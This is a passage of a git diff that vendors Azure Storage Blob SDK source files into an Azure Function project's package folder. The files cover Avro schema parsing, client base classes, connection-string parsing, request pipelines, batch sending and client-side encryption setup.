+ % (json_string, sorted(names.names))) + return schema + + +def _schema_from_json_array(json_array, names): + def MakeSchema(desc): + return schema_from_json_data(json_data=desc, names=names) + + return UnionSchema(map(MakeSchema, json_array)) + + +def _schema_from_json_object(json_object, names): + data_type = json_object.get('type') + if data_type is None: + raise SchemaParseException( + 'Avro schema JSON descriptor has no "type" property: %r' % json_object) + + other_props = dict( + filter_keys_out(items=json_object, keys=SCHEMA_RESERVED_PROPS)) + + if data_type in PRIMITIVE_TYPES: + # FIXME should not ignore other properties + result = PrimitiveSchema(data_type, other_props=other_props) + + elif data_type in NAMED_TYPES: + name = json_object.get('name') + namespace = json_object.get('namespace', names.default_namespace) + if data_type == FIXED: + size = json_object.get('size') + result = FixedSchema(name, namespace, size, names, other_props) + elif data_type == ENUM: + symbols = json_object.get('symbols') + doc = json_object.get('doc') + result = EnumSchema(name, namespace, symbols, names, doc, other_props) + + elif data_type in [RECORD, ERROR]: + field_desc_list = json_object.get('fields', ()) + + def MakeFields(names): + return tuple(RecordSchema.make_field_list(field_desc_list, names)) + + result = RecordSchema( + name=name, + namespace=namespace, + make_fields=MakeFields, + names=names, + record_type=data_type, + doc=json_object.get('doc'), + other_props=other_props, + ) + else: + raise Exception('Internal error: unknown type %r.' % data_type) + + elif data_type in VALID_TYPES: + # Unnamed, non-primitive Avro type: + + if data_type == ARRAY: + items_desc = json_object.get('items') + if items_desc is None: + raise SchemaParseException( + 'Invalid array schema descriptor with no "items" : %r.' + % json_object) + result = ArraySchema( + items=schema_from_json_data(items_desc, names), + other_props=other_props, + ) + + elif data_type == MAP: + values_desc = json_object.get('values') + if values_desc is None: + raise SchemaParseException( + 'Invalid map schema descriptor with no "values" : %r.' + % json_object) + result = MapSchema( + values=schema_from_json_data(values_desc, names=names), + other_props=other_props, + ) + + elif data_type == ERROR_UNION: + error_desc_list = json_object.get('declared_errors') + assert error_desc_list is not None + error_schemas = map( + lambda desc: schema_from_json_data(desc, names=names), + error_desc_list) + result = ErrorUnionSchema(schemas=error_schemas) + + else: + raise Exception('Internal error: unknown type %r.' % data_type) + else: + raise SchemaParseException( + 'Invalid JSON descriptor for an Avro schema: %r' % json_object) + return result + + +# Parsers for the JSON data types: +_JSONDataParserTypeMap = { + _str: _schema_from_json_string, + list: _schema_from_json_array, + dict: _schema_from_json_object, +} + + +def schema_from_json_data(json_data, names=None): + """Builds an Avro Schema from its JSON descriptor. + + Args: + json_data: JSON data representing the descriptor of the Avro schema. + names: Optional tracker for Avro named schemas. + Returns: + The Avro schema parsed from the JSON descriptor. + Raises: + SchemaParseException: if the descriptor is invalid. + """ + if names is None: + names = Names() + + # Select the appropriate parser based on the JSON data type: + parser = _JSONDataParserTypeMap.get(type(json_data)) + if parser is None: + raise SchemaParseException( + 'Invalid JSON descriptor for an Avro schema: %r.' 
% json_data) + return parser(json_data, names=names) + + +# ------------------------------------------------------------------------------ + + +def parse(json_string): + """Constructs a Schema from its JSON descriptor in text form. + + Args: + json_string: String representation of the JSON descriptor of the schema. + Returns: + The parsed schema. + Raises: + SchemaParseException: on JSON parsing error, + or if the JSON descriptor is invalid. + """ + try: + json_data = json.loads(json_string) + except Exception as exn: + raise SchemaParseException( + 'Error parsing schema from JSON: %r. ' + 'Error message: %r.' + % (json_string, exn)) + + # Initialize the names object + names = Names() + + # construct the Avro Schema object + return schema_from_json_data(json_data, names) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client.py new file mode 100644 index 0000000..85fde97 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client.py @@ -0,0 +1,463 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import logging +import uuid +from typing import ( # pylint: disable=unused-import + Optional, + Any, + Tuple, +) + +try: + from urllib.parse import parse_qs, quote +except ImportError: + from urlparse import parse_qs # type: ignore + from urllib2 import quote # type: ignore + +import six + +from azure.core.configuration import Configuration +from azure.core.credentials import AzureSasCredential +from azure.core.exceptions import HttpResponseError +from azure.core.pipeline import Pipeline +from azure.core.pipeline.transport import RequestsTransport, HttpTransport +from azure.core.pipeline.policies import ( + AzureSasCredentialPolicy, + ContentDecodePolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, + RedirectPolicy, + ProxyPolicy, + UserAgentPolicy, +) + +from .constants import CONNECTION_TIMEOUT, READ_TIMEOUT, SERVICE_HOST_BASE +from .models import LocationMode +from .authentication import SharedKeyCredentialPolicy +from .shared_access_signature import QueryStringConstants +from .request_handlers import serialize_batch_body, _get_batch_request_delimiter +from .policies import ( + ExponentialRetry, + StorageBearerTokenCredentialPolicy, + StorageContentValidation, + StorageHeadersPolicy, + StorageHosts, + StorageLoggingPolicy, + StorageRequestHook, + StorageResponseHook, + QueueMessagePolicy, +) +from .._version import VERSION +from .response_handlers import process_storage_error, PartialBatchErrorException + + +_LOGGER = logging.getLogger(__name__) +_SERVICE_PARAMS = { + "blob": {"primary": "BLOBENDPOINT", "secondary": "BLOBSECONDARYENDPOINT"}, + "queue": {"primary": "QUEUEENDPOINT", "secondary": "QUEUESECONDARYENDPOINT"}, + "file": {"primary": "FILEENDPOINT", "secondary": "FILESECONDARYENDPOINT"}, + "dfs": {"primary": "BLOBENDPOINT", "secondary": "BLOBENDPOINT"}, +} + + +class StorageAccountHostsMixin(object): # pylint: disable=too-many-instance-attributes + def __init__( + self, + parsed_url, # type: Any + service, # type: str + credential=None, 
# type: Optional[Any] + **kwargs # type: Any + ): + # type: (...) -> None + self._location_mode = kwargs.get("_location_mode", LocationMode.PRIMARY) + self._hosts = kwargs.get("_hosts") + self.scheme = parsed_url.scheme + + if service not in ["blob", "queue", "file-share", "dfs"]: + raise ValueError("Invalid service: {}".format(service)) + service_name = service.split('-')[0] + account = parsed_url.netloc.split(".{}.core.".format(service_name)) + + self.account_name = account[0] if len(account) > 1 else None + if not self.account_name and parsed_url.netloc.startswith("localhost") \ + or parsed_url.netloc.startswith("127.0.0.1"): + self.account_name = parsed_url.path.strip("/") + + self.credential = _format_shared_key_credential(self.account_name, credential) + if self.scheme.lower() != "https" and hasattr(self.credential, "get_token"): + raise ValueError("Token credential is only supported with HTTPS.") + + secondary_hostname = None + if hasattr(self.credential, "account_name"): + self.account_name = self.credential.account_name + secondary_hostname = "{}-secondary.{}.{}".format( + self.credential.account_name, service_name, SERVICE_HOST_BASE) + + if not self._hosts: + if len(account) > 1: + secondary_hostname = parsed_url.netloc.replace(account[0], account[0] + "-secondary") + if kwargs.get("secondary_hostname"): + secondary_hostname = kwargs["secondary_hostname"] + primary_hostname = (parsed_url.netloc + parsed_url.path).rstrip('/') + self._hosts = {LocationMode.PRIMARY: primary_hostname, LocationMode.SECONDARY: secondary_hostname} + + self.require_encryption = kwargs.get("require_encryption", False) + self.key_encryption_key = kwargs.get("key_encryption_key") + self.key_resolver_function = kwargs.get("key_resolver_function") + self._config, self._pipeline = self._create_pipeline(self.credential, storage_sdk=service, **kwargs) + + def __enter__(self): + self._client.__enter__() + return self + + def __exit__(self, *args): + self._client.__exit__(*args) + + def close(self): + """ This method is to close the sockets opened by the client. + It need not be used when using with a context manager. + """ + self._client.close() + + @property + def url(self): + """The full endpoint URL to this entity, including SAS token if used. + + This could be either the primary endpoint, + or the secondary endpoint depending on the current :func:`location_mode`. + """ + return self._format_url(self._hosts[self._location_mode]) + + @property + def primary_endpoint(self): + """The full primary endpoint URL. + + :type: str + """ + return self._format_url(self._hosts[LocationMode.PRIMARY]) + + @property + def primary_hostname(self): + """The hostname of the primary endpoint. + + :type: str + """ + return self._hosts[LocationMode.PRIMARY] + + @property + def secondary_endpoint(self): + """The full secondary endpoint URL if configured. + + If not available a ValueError will be raised. To explicitly specify a secondary hostname, use the optional + `secondary_hostname` keyword argument on instantiation. + + :type: str + :raise ValueError: + """ + if not self._hosts[LocationMode.SECONDARY]: + raise ValueError("No secondary host configured.") + return self._format_url(self._hosts[LocationMode.SECONDARY]) + + @property + def secondary_hostname(self): + """The hostname of the secondary endpoint. + + If not available this will be None. To explicitly specify a secondary hostname, use the optional + `secondary_hostname` keyword argument on instantiation. 
+ + :type: str or None + """ + return self._hosts[LocationMode.SECONDARY] + + @property + def location_mode(self): + """The location mode that the client is currently using. + + By default this will be "primary". Options include "primary" and "secondary". + + :type: str + """ + + return self._location_mode + + @location_mode.setter + def location_mode(self, value): + if self._hosts.get(value): + self._location_mode = value + self._client._config.url = self.url # pylint: disable=protected-access + else: + raise ValueError("No host URL for location mode: {}".format(value)) + + @property + def api_version(self): + """The version of the Storage API used for requests. + + :type: str + """ + return self._client._config.version # pylint: disable=protected-access + + def _format_query_string(self, sas_token, credential, snapshot=None, share_snapshot=None): + query_str = "?" + if snapshot: + query_str += "snapshot={}&".format(self.snapshot) + if share_snapshot: + query_str += "sharesnapshot={}&".format(self.snapshot) + if sas_token and isinstance(credential, AzureSasCredential): + raise ValueError( + "You cannot use AzureSasCredential when the resource URI also contains a Shared Access Signature.") + if is_credential_sastoken(credential): + query_str += credential.lstrip("?") + credential = None + elif sas_token: + query_str += sas_token + return query_str.rstrip("?&"), credential + + def _create_pipeline(self, credential, **kwargs): + # type: (Any, **Any) -> Tuple[Configuration, Pipeline] + self._credential_policy = None + if hasattr(credential, "get_token"): + self._credential_policy = StorageBearerTokenCredentialPolicy(credential) + elif isinstance(credential, SharedKeyCredentialPolicy): + self._credential_policy = credential + elif isinstance(credential, AzureSasCredential): + self._credential_policy = AzureSasCredentialPolicy(credential) + elif credential is not None: + raise TypeError("Unsupported credential: {}".format(credential)) + + config = kwargs.get("_configuration") or create_configuration(**kwargs) + if kwargs.get("_pipeline"): + return config, kwargs["_pipeline"] + config.transport = kwargs.get("transport") # type: ignore + kwargs.setdefault("connection_timeout", CONNECTION_TIMEOUT) + kwargs.setdefault("read_timeout", READ_TIMEOUT) + if not config.transport: + config.transport = RequestsTransport(**kwargs) + policies = [ + QueueMessagePolicy(), + config.proxy_policy, + config.user_agent_policy, + StorageContentValidation(), + ContentDecodePolicy(response_encoding="utf-8"), + RedirectPolicy(**kwargs), + StorageHosts(hosts=self._hosts, **kwargs), + config.retry_policy, + config.headers_policy, + StorageRequestHook(**kwargs), + self._credential_policy, + config.logging_policy, + StorageResponseHook(**kwargs), + DistributedTracingPolicy(**kwargs), + HttpLoggingPolicy(**kwargs) + ] + if kwargs.get("_additional_pipeline_policies"): + policies = policies + kwargs.get("_additional_pipeline_policies") + return config, Pipeline(config.transport, policies=policies) + + def _batch_send( + self, + *reqs, # type: HttpRequest + **kwargs + ): + """Given a series of request, do a Storage batch call. 
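+
+        The sub-requests are serialized into a single multipart/mixed POST
+        against the comp=batch endpoint; the expected 202 response is split
+        back into one part per sub-request.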
+ """ + # Pop it here, so requests doesn't feel bad about additional kwarg + raise_on_any_failure = kwargs.pop("raise_on_any_failure", True) + batch_id = str(uuid.uuid1()) + + request = self._client._client.post( # pylint: disable=protected-access + url='{}://{}/{}?{}comp=batch{}{}'.format( + self.scheme, + self.primary_hostname, + kwargs.pop('path', ""), + kwargs.pop('restype', ""), + kwargs.pop('sas', ""), + kwargs.pop('timeout', "") + ), + headers={ + 'x-ms-version': self.api_version, + "Content-Type": "multipart/mixed; boundary=" + _get_batch_request_delimiter(batch_id, False, False) + } + ) + + policies = [StorageHeadersPolicy()] + if self._credential_policy: + policies.append(self._credential_policy) + + request.set_multipart_mixed( + *reqs, + policies=policies, + enforce_https=False + ) + + Pipeline._prepare_multipart_mixed_request(request) # pylint: disable=protected-access + body = serialize_batch_body(request.multipart_mixed_info[0], batch_id) + request.set_bytes_body(body) + + temp = request.multipart_mixed_info + request.multipart_mixed_info = None + pipeline_response = self._pipeline.run( + request, **kwargs + ) + response = pipeline_response.http_response + request.multipart_mixed_info = temp + + try: + if response.status_code not in [202]: + raise HttpResponseError(response=response) + parts = response.parts() + if raise_on_any_failure: + parts = list(response.parts()) + if any(p for p in parts if not 200 <= p.status_code < 300): + error = PartialBatchErrorException( + message="There is a partial failure in the batch operation.", + response=response, parts=parts + ) + raise error + return iter(parts) + return parts + except HttpResponseError as error: + process_storage_error(error) + +class TransportWrapper(HttpTransport): + """Wrapper class that ensures that an inner client created + by a `get_client` method does not close the outer transport for the parent + when used in a context manager. 
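
_batch_send wraps the sub-requests in a multipart/mixed body whose MIME boundary embeds a fresh batch id. The exact helper (_get_batch_request_delimiter) lives elsewhere in this package; the shape sketched below is an assumption about its output, shown only to make the Content-Type header above concrete:

    import uuid

    def batch_delimiter(batch_id, prepend_dashes=False, append_dashes=False):
        # Assumed shape: "batch_<uuid>", with optional dashes for use
        # inside the body versus inside the header value.
        return "{}batch_{}{}".format("--" if prepend_dashes else "",
                                     batch_id,
                                     "--" if append_dashes else "")

    batch_id = str(uuid.uuid1())
    print("Content-Type: multipart/mixed; boundary=" + batch_delimiter(batch_id))
    print(batch_delimiter(batch_id, True, True))  # closing delimiter in the body
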
+    """
+    def __init__(self, transport):
+        self._transport = transport
+
+    def send(self, request, **kwargs):
+        return self._transport.send(request, **kwargs)
+
+    def open(self):
+        pass
+
+    def close(self):
+        pass
+
+    def __enter__(self):
+        pass
+
+    def __exit__(self, *args):  # pylint: disable=arguments-differ
+        pass
+
+
+def _format_shared_key_credential(account_name, credential):
+    if isinstance(credential, six.string_types):
+        if not account_name:
+            raise ValueError("Unable to determine account name for shared key credential.")
+        credential = {"account_name": account_name, "account_key": credential}
+    if isinstance(credential, dict):
+        if "account_name" not in credential:
+            raise ValueError("Shared key credential missing 'account_name'")
+        if "account_key" not in credential:
+            raise ValueError("Shared key credential missing 'account_key'")
+        return SharedKeyCredentialPolicy(**credential)
+    return credential
+
+
+def parse_connection_str(conn_str, credential, service):
+    conn_str = conn_str.rstrip(";")
+    conn_settings = [s.split("=", 1) for s in conn_str.split(";")]
+    if any(len(tup) != 2 for tup in conn_settings):
+        raise ValueError("Connection string is either blank or malformed.")
+    conn_settings = dict((key.upper(), val) for key, val in conn_settings)
+    endpoints = _SERVICE_PARAMS[service]
+    primary = None
+    secondary = None
+    if not credential:
+        try:
+            credential = {"account_name": conn_settings["ACCOUNTNAME"], "account_key": conn_settings["ACCOUNTKEY"]}
+        except KeyError:
+            credential = conn_settings.get("SHAREDACCESSSIGNATURE")
+    if endpoints["primary"] in conn_settings:
+        primary = conn_settings[endpoints["primary"]]
+        if endpoints["secondary"] in conn_settings:
+            secondary = conn_settings[endpoints["secondary"]]
+    else:
+        if endpoints["secondary"] in conn_settings:
+            raise ValueError("Connection string specifies only secondary endpoint.")
+        try:
+            primary = "{}://{}.{}.{}".format(
+                conn_settings["DEFAULTENDPOINTSPROTOCOL"],
+                conn_settings["ACCOUNTNAME"],
+                service,
+                conn_settings["ENDPOINTSUFFIX"],
+            )
+            secondary = "{}-secondary.{}.{}".format(
+                conn_settings["ACCOUNTNAME"], service, conn_settings["ENDPOINTSUFFIX"]
+            )
+        except KeyError:
+            pass
+
+    if not primary:
+        try:
+            primary = "https://{}.{}.{}".format(
+                conn_settings["ACCOUNTNAME"], service, conn_settings.get("ENDPOINTSUFFIX", SERVICE_HOST_BASE)
+            )
+        except KeyError:
+            raise ValueError("Connection string missing required connection details.")
+    if service == "dfs":
+        primary = primary.replace(".blob.", ".dfs.")
+        if secondary:
+            secondary = secondary.replace(".blob.", ".dfs.")
+    return primary, secondary, credential
+
+
+def create_configuration(**kwargs):
+    # type: (**Any) -> Configuration
+    config = Configuration(**kwargs)
+    config.headers_policy = StorageHeadersPolicy(**kwargs)
+    config.user_agent_policy = UserAgentPolicy(
+        sdk_moniker="storage-{}/{}".format(kwargs.pop('storage_sdk'), VERSION), **kwargs)
+    config.retry_policy = kwargs.get("retry_policy") or ExponentialRetry(**kwargs)
+    config.logging_policy = StorageLoggingPolicy(**kwargs)
+    config.proxy_policy = ProxyPolicy(**kwargs)
+
+    # Storage settings
+    config.max_single_put_size = kwargs.get("max_single_put_size", 64 * 1024 * 1024)
+    config.copy_polling_interval = 15
+
+    # Block blob uploads
+    config.max_block_size = kwargs.get("max_block_size", 4 * 1024 * 1024)
+    config.min_large_block_upload_threshold = kwargs.get("min_large_block_upload_threshold", 4 * 1024 * 1024 + 1)
+    config.use_byte_buffer = kwargs.get("use_byte_buffer", False)
+
+    # Page blob uploads
+    
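
parse_connection_str above derives the primary (and, by convention, secondary) endpoint from the key/value pairs in a connection string. A condensed, runnable restatement with hypothetical values (a real string comes from the Azure portal, and the SDK additionally uppercases the keys):

    conn_str = (
        "DefaultEndpointsProtocol=https;AccountName=mystorage;"
        "AccountKey=aGVsbG8=;EndpointSuffix=core.windows.net"
    )
    settings = dict(s.split("=", 1) for s in conn_str.rstrip(";").split(";"))
    primary = "{}://{}.blob.{}".format(
        settings["DefaultEndpointsProtocol"], settings["AccountName"], settings["EndpointSuffix"])
    secondary = "{}-secondary.blob.{}".format(settings["AccountName"], settings["EndpointSuffix"])
    assert primary == "https://mystorage.blob.core.windows.net"
    assert secondary == "mystorage-secondary.blob.core.windows.net"
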
config.max_page_size = kwargs.get("max_page_size", 4 * 1024 * 1024) + + # Datalake file uploads + config.min_large_chunk_upload_threshold = kwargs.get("min_large_chunk_upload_threshold", 100 * 1024 * 1024 + 1) + + # Blob downloads + config.max_single_get_size = kwargs.get("max_single_get_size", 32 * 1024 * 1024) + config.max_chunk_get_size = kwargs.get("max_chunk_get_size", 4 * 1024 * 1024) + + # File uploads + config.max_range_size = kwargs.get("max_range_size", 4 * 1024 * 1024) + return config + + +def parse_query(query_str): + sas_values = QueryStringConstants.to_list() + parsed_query = {k: v[0] for k, v in parse_qs(query_str).items()} + sas_params = ["{}={}".format(k, quote(v, safe='')) for k, v in parsed_query.items() if k in sas_values] + sas_token = None + if sas_params: + sas_token = "&".join(sas_params) + + snapshot = parsed_query.get("snapshot") or parsed_query.get("sharesnapshot") + return snapshot, sas_token + + +def is_credential_sastoken(credential): + if not credential or not isinstance(credential, six.string_types): + return False + + sas_values = QueryStringConstants.to_list() + parsed_query = parse_qs(credential.lstrip("?")) + if parsed_query and all([k in sas_values for k in parsed_query.keys()]): + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client_async.py new file mode 100644 index 0000000..c015771 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/base_client_async.py @@ -0,0 +1,191 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
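
is_credential_sastoken above treats a string credential as a SAS token only when every query-string key is a recognized SAS parameter. A condensed restatement with a hand-picked subset of keys (QueryStringConstants covers more):

    from urllib.parse import parse_qs

    SAS_KEYS = {"sv", "ss", "srt", "sp", "se", "st", "spr", "sig"}  # illustrative subset

    def looks_like_sas_token(credential):
        # A string counts as a SAS only if every query key is a SAS key.
        if not credential or not isinstance(credential, str):
            return False
        parsed = parse_qs(credential.lstrip("?"))
        return bool(parsed) and all(k in SAS_KEYS for k in parsed)

    assert looks_like_sas_token("?sv=2021-08-06&sig=abc%3D")
    assert not looks_like_sas_token("aGVsbG8=")  # an account key, not a SAS
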
+# -------------------------------------------------------------------------- + +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, Iterable, Dict, List, Type, Tuple, + TYPE_CHECKING +) +import logging + +from azure.core.credentials import AzureSasCredential +from azure.core.pipeline import AsyncPipeline +from azure.core.async_paging import AsyncList +from azure.core.exceptions import HttpResponseError +from azure.core.pipeline.policies import ( + AsyncRedirectPolicy, + AzureSasCredentialPolicy, + ContentDecodePolicy, + DistributedTracingPolicy, + HttpLoggingPolicy, +) +from azure.core.pipeline.transport import AsyncHttpTransport + +from .constants import CONNECTION_TIMEOUT, READ_TIMEOUT +from .authentication import SharedKeyCredentialPolicy +from .base_client import create_configuration +from .policies import ( + StorageContentValidation, + StorageHeadersPolicy, + StorageHosts, + StorageRequestHook, + QueueMessagePolicy +) +from .policies_async import AsyncStorageBearerTokenCredentialPolicy, AsyncStorageResponseHook + +from .response_handlers import process_storage_error, PartialBatchErrorException + +if TYPE_CHECKING: + from azure.core.pipeline import Pipeline + from azure.core.pipeline.transport import HttpRequest + from azure.core.configuration import Configuration +_LOGGER = logging.getLogger(__name__) + + +class AsyncStorageAccountHostsMixin(object): + + def __enter__(self): + raise TypeError("Async client only supports 'async with'.") + + def __exit__(self, *args): + pass + + async def __aenter__(self): + await self._client.__aenter__() + return self + + async def __aexit__(self, *args): + await self._client.__aexit__(*args) + + async def close(self): + """ This method is to close the sockets opened by the client. + It need not be used when using with a context manager. + """ + await self._client.close() + + def _create_pipeline(self, credential, **kwargs): + # type: (Any, **Any) -> Tuple[Configuration, Pipeline] + self._credential_policy = None + if hasattr(credential, 'get_token'): + self._credential_policy = AsyncStorageBearerTokenCredentialPolicy(credential) + elif isinstance(credential, SharedKeyCredentialPolicy): + self._credential_policy = credential + elif isinstance(credential, AzureSasCredential): + self._credential_policy = AzureSasCredentialPolicy(credential) + elif credential is not None: + raise TypeError("Unsupported credential: {}".format(credential)) + config = kwargs.get('_configuration') or create_configuration(**kwargs) + if kwargs.get('_pipeline'): + return config, kwargs['_pipeline'] + config.transport = kwargs.get('transport') # type: ignore + kwargs.setdefault("connection_timeout", CONNECTION_TIMEOUT) + kwargs.setdefault("read_timeout", READ_TIMEOUT) + if not config.transport: + try: + from azure.core.pipeline.transport import AioHttpTransport + except ImportError: + raise ImportError("Unable to create async transport. 
Please check aiohttp is installed.") + config.transport = AioHttpTransport(**kwargs) + policies = [ + QueueMessagePolicy(), + config.headers_policy, + config.proxy_policy, + config.user_agent_policy, + StorageContentValidation(), + StorageRequestHook(**kwargs), + self._credential_policy, + ContentDecodePolicy(response_encoding="utf-8"), + AsyncRedirectPolicy(**kwargs), + StorageHosts(hosts=self._hosts, **kwargs), # type: ignore + config.retry_policy, + config.logging_policy, + AsyncStorageResponseHook(**kwargs), + DistributedTracingPolicy(**kwargs), + HttpLoggingPolicy(**kwargs), + ] + if kwargs.get("_additional_pipeline_policies"): + policies = policies + kwargs.get("_additional_pipeline_policies") + return config, AsyncPipeline(config.transport, policies=policies) + + async def _batch_send( + self, + *reqs, # type: HttpRequest + **kwargs + ): + """Given a series of request, do a Storage batch call. + """ + # Pop it here, so requests doesn't feel bad about additional kwarg + raise_on_any_failure = kwargs.pop("raise_on_any_failure", True) + request = self._client._client.post( # pylint: disable=protected-access + url='{}://{}/{}?{}comp=batch{}{}'.format( + self.scheme, + self.primary_hostname, + kwargs.pop('path', ""), + kwargs.pop('restype', ""), + kwargs.pop('sas', ""), + kwargs.pop('timeout', "") + ), + headers={ + 'x-ms-version': self.api_version + } + ) + + policies = [StorageHeadersPolicy()] + if self._credential_policy: + policies.append(self._credential_policy) + + request.set_multipart_mixed( + *reqs, + policies=policies, + enforce_https=False + ) + + pipeline_response = await self._pipeline.run( + request, **kwargs + ) + response = pipeline_response.http_response + + try: + if response.status_code not in [202]: + raise HttpResponseError(response=response) + parts = response.parts() # Return an AsyncIterator + if raise_on_any_failure: + parts_list = [] + async for part in parts: + parts_list.append(part) + if any(p for p in parts_list if not 200 <= p.status_code < 300): + error = PartialBatchErrorException( + message="There is a partial failure in the batch operation.", + response=response, parts=parts_list + ) + raise error + return AsyncList(parts_list) + return parts + except HttpResponseError as error: + process_storage_error(error) + + +class AsyncTransportWrapper(AsyncHttpTransport): + """Wrapper class that ensures that an inner client created + by a `get_client` method does not close the outer transport for the parent + when used in a context manager. + """ + def __init__(self, async_transport): + self._transport = async_transport + + async def send(self, request, **kwargs): + return await self._transport.send(request, **kwargs) + + async def open(self): + pass + + async def close(self): + pass + + async def __aenter__(self): + pass + + async def __aexit__(self, *args): # pylint: disable=arguments-differ + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/constants.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/constants.py new file mode 100644 index 0000000..bdda02f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/constants.py @@ -0,0 +1,19 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. 
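
The async mixin above deliberately rejects the synchronous "with" statement, so clients built on it must be used with "async with". A usage sketch with placeholder endpoint and key (not runnable without real credentials and the aiohttp transport):

    import asyncio
    from azure.storage.blob.aio import BlobServiceClient  # requires aiohttp

    async def main():
        # "async with" drives the __aenter__/__aexit__ defined on the mixin.
        async with BlobServiceClient("https://mystorage.blob.core.windows.net",
                                     credential="<account-key>") as client:
            props = await client.get_service_properties()
            print(props)

    # asyncio.run(main())  # uncomment once real credentials are supplied
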
See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +from .._serialize import _SUPPORTED_API_VERSIONS + + +X_MS_VERSION = _SUPPORTED_API_VERSIONS[-1] + +# Default socket timeouts, in seconds +CONNECTION_TIMEOUT = 20 +READ_TIMEOUT = 80000 # 4000MB (max block size) / 50KB/s (an arbitrarily chosen minimum upload speed) + +DEFAULT_OAUTH_SCOPE = "/.default" +STORAGE_OAUTH_SCOPE = "https://storage.azure.com/.default" + +SERVICE_HOST_BASE = 'core.windows.net' diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/encryption.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/encryption.py new file mode 100644 index 0000000..a996b64 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/encryption.py @@ -0,0 +1,542 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +import os +from os import urandom +from json import ( + dumps, + loads, +) +from collections import OrderedDict + +from cryptography.hazmat.backends import default_backend +from cryptography.hazmat.primitives.ciphers import Cipher +from cryptography.hazmat.primitives.ciphers.algorithms import AES +from cryptography.hazmat.primitives.ciphers.modes import CBC +from cryptography.hazmat.primitives.padding import PKCS7 + +from azure.core.exceptions import HttpResponseError + +from .._version import VERSION +from . import encode_base64, decode_base64_to_bytes + + +_ENCRYPTION_PROTOCOL_V1 = '1.0' +_ERROR_OBJECT_INVALID = \ + '{0} does not define a complete interface. Value of {1} is either missing or invalid.' + + +def _validate_not_none(param_name, param): + if param is None: + raise ValueError('{0} should not be None.'.format(param_name)) + + +def _validate_key_encryption_key_wrap(kek): + # Note that None is not callable and so will fail the second clause of each check. + if not hasattr(kek, 'wrap_key') or not callable(kek.wrap_key): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'wrap_key')) + if not hasattr(kek, 'get_kid') or not callable(kek.get_kid): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'get_kid')) + if not hasattr(kek, 'get_key_wrap_algorithm') or not callable(kek.get_key_wrap_algorithm): + raise AttributeError(_ERROR_OBJECT_INVALID.format('key encryption key', 'get_key_wrap_algorithm')) + + +class _EncryptionAlgorithm(object): + ''' + Specifies which client encryption algorithm is used. + ''' + AES_CBC_256 = 'AES_CBC_256' + + +class _WrappedContentKey: + ''' + Represents the envelope key details stored on the service. + ''' + + def __init__(self, algorithm, encrypted_key, key_id): + ''' + :param str algorithm: + The algorithm used for wrapping. + :param bytes encrypted_key: + The encrypted content-encryption-key. + :param str key_id: + The key-encryption-key identifier string. 
+ ''' + + _validate_not_none('algorithm', algorithm) + _validate_not_none('encrypted_key', encrypted_key) + _validate_not_none('key_id', key_id) + + self.algorithm = algorithm + self.encrypted_key = encrypted_key + self.key_id = key_id + + +class _EncryptionAgent: + ''' + Represents the encryption agent stored on the service. + It consists of the encryption protocol version and encryption algorithm used. + ''' + + def __init__(self, encryption_algorithm, protocol): + ''' + :param _EncryptionAlgorithm encryption_algorithm: + The algorithm used for encrypting the message contents. + :param str protocol: + The protocol version used for encryption. + ''' + + _validate_not_none('encryption_algorithm', encryption_algorithm) + _validate_not_none('protocol', protocol) + + self.encryption_algorithm = str(encryption_algorithm) + self.protocol = protocol + + +class _EncryptionData: + ''' + Represents the encryption data that is stored on the service. + ''' + + def __init__(self, content_encryption_IV, encryption_agent, wrapped_content_key, + key_wrapping_metadata): + ''' + :param bytes content_encryption_IV: + The content encryption initialization vector. + :param _EncryptionAgent encryption_agent: + The encryption agent. + :param _WrappedContentKey wrapped_content_key: + An object that stores the wrapping algorithm, the key identifier, + and the encrypted key bytes. + :param dict key_wrapping_metadata: + A dict containing metadata related to the key wrapping. + ''' + + _validate_not_none('content_encryption_IV', content_encryption_IV) + _validate_not_none('encryption_agent', encryption_agent) + _validate_not_none('wrapped_content_key', wrapped_content_key) + + self.content_encryption_IV = content_encryption_IV + self.encryption_agent = encryption_agent + self.wrapped_content_key = wrapped_content_key + self.key_wrapping_metadata = key_wrapping_metadata + + +def _generate_encryption_data_dict(kek, cek, iv): + ''' + Generates and returns the encryption metadata as a dict. + + :param object kek: The key encryption key. See calling functions for more information. + :param bytes cek: The content encryption key. + :param bytes iv: The initialization vector. + :return: A dict containing all the encryption metadata. + :rtype: dict + ''' + # Encrypt the cek. + wrapped_cek = kek.wrap_key(cek) + + # Build the encryption_data dict. + # Use OrderedDict to comply with Java's ordering requirement. + wrapped_content_key = OrderedDict() + 